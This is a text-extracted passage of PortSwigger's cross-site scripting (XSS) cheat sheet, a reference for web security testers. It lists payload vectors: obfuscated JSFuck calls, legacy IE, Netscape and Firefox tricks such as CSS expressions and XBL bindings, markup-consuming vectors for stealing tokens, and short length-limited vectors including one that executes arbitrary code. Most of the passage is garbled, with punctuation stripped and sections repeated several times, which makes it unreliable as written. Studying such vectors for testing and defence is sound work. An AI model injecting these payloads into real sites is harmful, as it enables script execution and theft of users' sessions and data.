GreyMagic HTML+time exploit (no longer workseven in 5 docmode)

ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have a onload eventinside SVG

ltsvggtltxss onload=alert(1)gt

Isindex using src attribute ltisindex type=image src=evil

Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil

Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt

Isindex and action ltisindex type=submit action=javascriptalert(1)gt

CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request

Page 19: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

XSS into a JavaScript string HieroglyphyJSFuck(window)

window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(self)

self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(this)

this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(top)

top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(parent)

parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(frames)

frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Impossible labs

Classic vectors (XSS crypt)

Image src with JavaScript protocol ltimg src=javascriptalert(1)gt

Body background with JavaScript protocol ltbody background=javascriptalert(1)gt

Iframe data urls no longer work as modern browsersuse a null origin

ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt

Title Description Lengthlimit

Closest vector Link

Basic context WAFblocks lt[a-zA-Z]

This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag

NA NA 128279

Script based injectionbut quotes forwardslash and backslash areescaped

We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block

The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML

NA NA 128279

innerHTML context butno equals allowed

You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event

NA NA 128279

Basic context lengthlimit

This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it

15 ltq oncut=alert`` 128279

Attribute context lengthlimit

The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it

14 oncut=alert`` 128279

Basic context lengthlimit arbitrary code

Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code

19 ltqoncut=eval(name)

128279

Attribute context lengthlimit arbitrary code

Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript

17 See link 128279

Injection occurs inside aframeset but before thebody

We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy

NA NA 128279

Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`

NA NA 128279

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in NetscapeNavigator

lta title=ampalert(1)gtXSSltagt

JavaScript stylesheets used to be supported byNetscape Navigator

ltlink href=xssjs rel=stylesheet type=textjavascriptgt

Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme

IE9 select elements and plaintext used to consumemarkup

ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt

In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt

Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt

Older versions of IE supported event handlers infunctions

ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt

y

ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt

GreyMagic HTML+time exploit (no longer workseven in 5 docmode)

ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have a onload eventinside SVG

ltsvggtltxss onload=alert(1)gt

Isindex using src attribute ltisindex type=image src=evil

Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil

Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt

Isindex and action ltisindex type=submit action=javascriptalert(1)gt

CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request

Page 20: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in Netscape Navigator:
<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator:
<link href="xss.js" rel="stylesheet" type="text/javascript">

Button used to consume markup:
<form><button name="x" formaction="x"><b>stealme

IE9 select elements and plaintext used to consume markup:
<form action="x"><button>XSS</button><select name="x"><option><plaintext><script>token="supersecret"</script>

XBL (Firefox only, <= 2):
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">

XBL also worked in FF 3.5 using data URLs:
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions (<= IE7):
<div style="xss:expression(alert(1))">
<div style="xss:expression(1)-alert(1)">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio\006e(alert(1))">
<div style="xss:expressio\00006e(alert(1))">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of ::
<div style="xss=expression(alert(1))">
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE:
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions:
<script>function window.onload(){alert(1)}</script>
<script>function window::onload(){alert(1)}</script>
<script>function window.location(){}</script>
<body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>

GreyMagic HTML+time exploit (no longer works, even in 5 docmode):
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"></BODY></HTML>

Firefox allows NULLs after &:
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities:
<a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments:
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG:
<svg><xss onload=alert(1)>

Isindex using src attribute:
<isindex type=image src=evil

Isindex using submit:
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=evil

Isindex and formaction:
<isindex type=submit formaction=javascript:alert(1)>

Isindex and action:
<isindex type=submit action=javascript:alert(1)>

Credits: Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

